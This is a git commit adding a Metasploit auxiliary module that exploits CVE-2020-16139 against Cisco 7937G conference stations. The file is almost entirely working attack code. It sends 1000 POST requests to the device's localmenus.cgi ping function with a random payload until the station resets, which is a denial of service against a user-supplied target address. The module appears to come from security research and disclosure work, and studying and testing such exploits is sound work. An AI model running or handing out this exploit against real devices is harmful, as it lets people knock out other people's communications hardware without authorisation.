Add files via upload

2020-08-14 12:16:52 -04:00 · 2020-08-14 12:16:52 -04:00 · 7d125c9741
parent ffa23ba850
commit 7d125c9741
1 changed files with 82 additions and 0 deletions
--- a/modules/auxiliary/dos/cisco/cve_2020_16139.py
+++ b/modules/auxiliary/dos/cisco/cve_2020_16139.py
@ -0,0 +1,82 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# standard modules
+from metasploit import module
+import logging
+
+# extra modules
+requests_missing = False
+random_missing = False
+string_missing = False
+
+try:
+    import requests
+except ImportError:
+    requests_missing = True
+try:
+    import random
+except ImportError:
+    random_missing = True
+try:
+    import string
+except ImportError:
+    string_missing = True
+
+metadata = {
+    'name': 'Cisco 7937G Denial-of-Service Reboot Attack',
+    'description': '''
+	This module exploits a bug in how the conference station handles executing a ping via it's web interface. By repeatedly executing the ping function without clearing out the resulting output, a DoS is caused that will reset the device after a few minutes.
+    ''',
+    'authors': [
+        'Cody Martin'
+	# Author Homepage: debifrank.github.io
+	# Organization: BlackLanternSecurity
+	# Org. Homepage: BlackLanternSecurity.com
+    ],
+    'date': '2020-06-02',
+    'license': 'GPL_LICENSE',
+    'references': [
+        {'type': 'url', 'ref': 'https://blacklanternsecurity.com/2020-08-07-Cisco-Unified-IP-Conference-Station-7937G/'},
+        {'type': 'cve', 'ref': '2020-16139'}
+    ],
+    'type': 'dos',
+    'options': {
+        'rhost': {'type': 'address', 
+		  'description': 'Target address', 
+		  'required': True, 
+		  'default': 'None'
+	}
+    }
+}
+
+def run(args):
+    module.LogHandler.setup(msg_prefix='{} - '.format(args['rhost']))
+    if requests_missing:
+        logging.error('Required Python module dependency (requests) is missing.')
+        logging.error('Please execute pip3 install requests.')
+        return
+    if random_missing:
+        logging.error('Required Python module dependency (random) is missing.')
+        logging.error('Please execute pip3 install random.')
+    if string_missing:
+        logging.error('Required Python module dependency (string) is missing.')
+        logging.error('Please execute pip3 install string.')
+
+    url = "http://{}/localmenus.cgi".format(args['rhost'])
+    data = ''.join(random.choice(string.ascii_letters) for i in range(46))
+    payload = {"func": "609", "data": data, "rphl": "1"}
+    logging.info("Sending DoS Packets. Stand by.")
+    for i in range(1000):
+        try:
+            r = requests.post(url=url, params=payload, timeout=5)
+            if r.status_code != 200:
+                logging.error("Device doesn't appear to be functioning or web access is not enabled.")
+                return
+        except requests.exceptions.ReadTimeout as e:
+            logging.info('DoS reset attack completed!')
+            return
+
+
+if __name__ == '__main__':
+    module.run(metadata, run)